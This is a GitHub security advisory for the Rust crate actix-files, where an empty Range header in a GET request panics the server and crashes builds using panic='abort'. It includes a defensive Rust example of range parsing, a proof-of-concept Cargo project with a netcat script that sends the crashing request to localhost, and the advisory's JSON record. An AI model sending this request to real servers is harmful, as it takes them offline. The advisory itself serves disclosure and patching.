GHSA-GCQF-3G44-VC9P
Vulnerability from github – Published: 2026-02-06 19:00 – Updated: 2026-02-06 19:00
Summary
A `GET` request for a static file served by `actix-files` with an empty `Range` header triggers a panic. With `panic = "abort"`, a remote user may crash the process on-demand.
Details
`actix-files` assumes that `HttpRange::parse()`, when `Ok`, always returns a vector with at least one element. When `parse()` is called on an empty string, it returns `Ok(vec![])`. This can cause a panic at `named.rs:534` when handling an HTTP request with an empty `Range:` header. This shouldn't significantly impact programs built with the default `panic = "unwind"`, as the only effect is that the connection is closed when the worker thread panics and new threads are spooled up on demand. Programs built with `panic = "abort"` are vulnerable to being crashed on-demand by any user with permissions to perform a `GET` request for a static file served by `actix-files`.
https://github.com/actix/actix-web/blob/0383f4bdd1210e726143ca1ebcf01169b67a4b6c/actix-files/src/named.rs#L530-L535
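The defect described above is a general one: a parser that returns `Ok` with an empty collection, and a caller that treats `Ok` as "at least one element" and indexes position zero. The following is an added example, not code from `actix-files` or the fix shipped in 0.6.10. It uses a deliberately simplified `Range` parser (`parse_range`) that reproduces only the behaviour the advisory describes, namely that an empty header value is `Ok(vec![])`, and a response planner (`plan_response`) that handles the empty case explicitly instead of indexing. The names `ByteRange`, `RangeError`, `Plan`, `parse_range` and `plan_response` are chosen for this illustration.

```rust
// Added example (not actix-files code): plan a static-file response without
// assuming a successful Range parse yields at least one range.
// `ByteRange`, `RangeError`, `Plan`, `parse_range` and `plan_response` are
// names chosen for this illustration; the parser is simplified and mirrors
// only the behaviour the advisory describes (empty value => Ok(vec![])).

/// One byte range already resolved against the file length.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct ByteRange {
    pub start: u64,
    pub length: u64,
}

#[derive(Debug, PartialEq, Eq)]
pub enum RangeError {
    /// Syntactically invalid header value.
    Malformed,
    /// Well-formed, but no byte of the requested range exists in the file.
    Unsatisfiable,
}

/// How the handler will answer the request.
#[derive(Debug, PartialEq, Eq)]
pub enum Plan {
    /// 200 OK with the entire file.
    Full,
    /// 206 Partial Content with the first requested range.
    Partial(ByteRange),
    /// 416 Range Not Satisfiable.
    Unsatisfiable,
}

/// Parse a `Range` header value against a file of `size` bytes.
/// Like the behaviour the advisory describes for `HttpRange::parse`, an
/// empty value is `Ok(vec![])`, not an error: `Ok` does not imply non-empty.
pub fn parse_range(value: &str, size: u64) -> Result<Vec<ByteRange>, RangeError> {
    let value = value.trim();
    if value.is_empty() {
        return Ok(Vec::new());
    }
    let specs = value.strip_prefix("bytes=").ok_or(RangeError::Malformed)?;
    let mut ranges = Vec::new();
    for spec in specs.split(',') {
        let (start, end) = spec.trim().split_once('-').ok_or(RangeError::Malformed)?;
        let range = match (start, end) {
            ("", "") => return Err(RangeError::Malformed),
            // "-N": the last N bytes of the file.
            ("", n) => {
                let n: u64 = n.parse().map_err(|_| RangeError::Malformed)?;
                if n == 0 {
                    return Err(RangeError::Unsatisfiable);
                }
                let length = n.min(size);
                ByteRange { start: size - length, length }
            }
            // "S-": from offset S to the end of the file.
            (s, "") => {
                let s: u64 = s.parse().map_err(|_| RangeError::Malformed)?;
                if s >= size {
                    return Err(RangeError::Unsatisfiable);
                }
                ByteRange { start: s, length: size - s }
            }
            // "S-E": inclusive offsets, E clamped to the last byte.
            (s, e) => {
                let s: u64 = s.parse().map_err(|_| RangeError::Malformed)?;
                let e: u64 = e.parse().map_err(|_| RangeError::Malformed)?;
                if s > e || s >= size {
                    return Err(RangeError::Unsatisfiable);
                }
                let e = e.min(size - 1);
                ByteRange { start: s, length: e - s + 1 }
            }
        };
        ranges.push(range);
    }
    Ok(ranges)
}

/// Decide the response for a GET of a `size`-byte file. `range_header` is the
/// raw header value, or `None` when the request carried no `Range` header.
pub fn plan_response(range_header: Option<&str>, size: u64) -> Plan {
    let value = match range_header {
        Some(v) => v,
        None => return Plan::Full,
    };
    match parse_range(value, size) {
        // The advisory's crash site indexed the vector directly; `first()`
        // forces the empty case to be handled. RFC 9110 permits a server to
        // ignore a Range header it cannot use, so an empty one gets the whole file.
        Ok(ranges) => match ranges.first() {
            Some(first) => Plan::Partial(*first),
            None => Plan::Full,
        },
        Err(RangeError::Malformed) => Plan::Full,
        Err(RangeError::Unsatisfiable) => Plan::Unsatisfiable,
    }
}

fn main() {
    // Constructed sample requests against a 1024-byte file.
    for header in [None, Some(""), Some("bytes=0-99"), Some("bytes=-100"), Some("bytes=2000-")] {
        println!("Range: {:?} -> {:?}", header, plan_response(header, 1024));
    }
}
```

Serving the full file for an empty or unparseable `Range` value is one defensible choice (the header is ignored, as RFC 9110 allows); answering 416 is another. What matters for the panic is that the empty vector is matched on rather than indexed, so a malformed header can no longer reach an `unwrap`-style failure regardless of the `panic` strategy the binary was built with.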
PoC
Minimal reproduction `Cargo.toml`:
```toml
[package]
name = "example"
version = "0.1.0"
edition = "2021"

[dependencies]
actix-web = "=4.5.1"
actix-files = "=0.6.5"

[profile.dev]
panic = "abort"
```
`src/main.rs`:
```rust
use actix_files::NamedFile;
use actix_web::{get, Responder};

#[get("/")]
async fn index() -> impl Responder {
    NamedFile::open("test_file")
}

#[actix_web::main]
async fn main() -> std::io::Result<()> {
    use actix_web::{App, HttpServer};

    HttpServer::new(|| App::new().service(index))
        .bind(("127.0.0.1", 8080))?
        .run()
        .await
}
```
`test.sh`:
```sh
#!/bin/bash

echo foo > test_file
cargo b
cargo r&
sleep 1
nc 127.0.0.1 8080 << EOF
GET / HTTP/1.1
Range:

EOF
kill %1
```
Create these files, then run `chmod +x test.sh && ./test.sh`. The server should start, then crash upon receiving the `GET` request from `netcat`.
This assumes a reasonably UNIX-like system with Rust, `bash` and `netcat` installed.
Impact
It is believed that only programs compiled with `panic = "abort"` are affected significantly. The only potential impact that can be seen is Denial of Service, though an attacker able to repeatedly send `GET` requests without those requests getting blocked by rate limiting, DDoS protection, etc. would be able to keep a server down indefinitely. As only a single unblocked request is needed to trigger the panic, merely having a rate limiter may not be enough to prevent this.
Though the impact in the worst case is significant, the real-world risk of this vulnerability appears to be limited, as it would be expected that anyone for whom uptime is a significant concern would not compile their program with `panic = "abort"`.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.6.9"
},
"package": {
"ecosystem": "crates.io",
"name": "actix-files"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.6.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-06T19:00:12Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nA GET request for a static file served by `actix-files` with an empty `Range` header triggers a panic. With `panic = \"abort\"`, a remote user may crash the process on-demand.\n\n### Details\n`actix-files` assumes that `HttpRange::parse()`, when `Ok`, always returns a vector with at least one element. When `parse()` is called on an empty string, it returns `Ok(vec![])`. This can cause a panic at named.rs:534 when handling an HTTP request with an empty `Range:` header. This shouldn\u0027t significantly impact programs built with the default `panic = \"unwind\"`, as the only effect is that the connection is closed when the worker thread panics and new threads are spooled up on demand. Programs built with `panic = \"abort\"` are vulnerable to being crashed on-demand by any user with permissions to perform a `GET` request for a static file served by `actix-files`.\nhttps://github.com/actix/actix-web/blob/0383f4bdd1210e726143ca1ebcf01169b67a4b6c/actix-files/src/named.rs#L530-L535\n\n### PoC\n\u003cdetails\u003e\n\u003csummary\u003eMinimal reproduction\u003c/summary\u003e\n\n`Cargo.toml`:\n```toml\n[package]\nname = \"example\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n[dependencies]\nactix-web = \"=4.5.1\"\nactix-files = \"=0.6.5\"\n\n[profile.dev]\npanic = \"abort\"\n```\n`src/main.rs`:\n```rust\nuse actix_files::NamedFile;\nuse actix_web::{get, Responder};\n\n#[get(\"/\")]\nasync fn index() -\u003e impl Responder {\n NamedFile::open(\"test_file\")\n}\n\n#[actix_web::main]\nasync fn main() -\u003e std::io::Result\u003c()\u003e {\n use actix_web::{App, HttpServer};\n\n HttpServer::new(|| App::new().service(index))\n .bind((\"127.0.0.1\", 8080))?\n .run()\n .await\n}\n```\n`test.sh`:\n```sh\n#!/bin/bash\n\necho foo \u003e test_file\ncargo b\ncargo r\u0026\nsleep 1\nnc 127.0.0.1 8080 \u003c\u003c EOF\nGET / HTTP/1.1\nRange:\n\nEOF\nkill %1\n```\n\nCreate these files, then run `chmod +x test.sh \u0026\u0026 ./test.sh`. The server should start, then crash upon receiving the `GET` request from `netcat`.\n\nThis assumes a reasonably UNIX-like system with Rust, `bash` and `netcat` installed.\n\u003c/details\u003e\n\n### Impact\nIt is believed that only programs compiled with panic = \"abort\" are affected significantly. The only potential impact that can be seen is Denial of Service, though an attacker able to repeatedly send GET requests without those requests getting blocked by rate limiting, DDoS protection, etc. would be able to keep a server down indefinitely. As only a single unblocked request is needed to trigger the panic, merely having a rate limiter may not be enough to prevent this.\n\nThough the impact in the worst case is significant, the real-world risk of this vulnerability appears to be limited, as it would be expected that anyone for whom uptime is a significant concern would not compile their program with panic = \"abort\".",
"id": "GHSA-gcqf-3g44-vc9p",
"modified": "2026-02-06T19:00:13Z",
"published": "2026-02-06T19:00:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/actix/actix-web/security/advisories/GHSA-gcqf-3g44-vc9p"
},
{
"type": "PACKAGE",
"url": "https://github.com/actix/actix-web"
},
{
"type": "WEB",
"url": "https://github.com/actix/actix-web/blob/0383f4bdd1210e726143ca1ebcf01169b67a4b6c/actix-files/src/named.rs#L530-L535"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "[actix-files] Panic triggered by empty Range header in GET request for static file"
}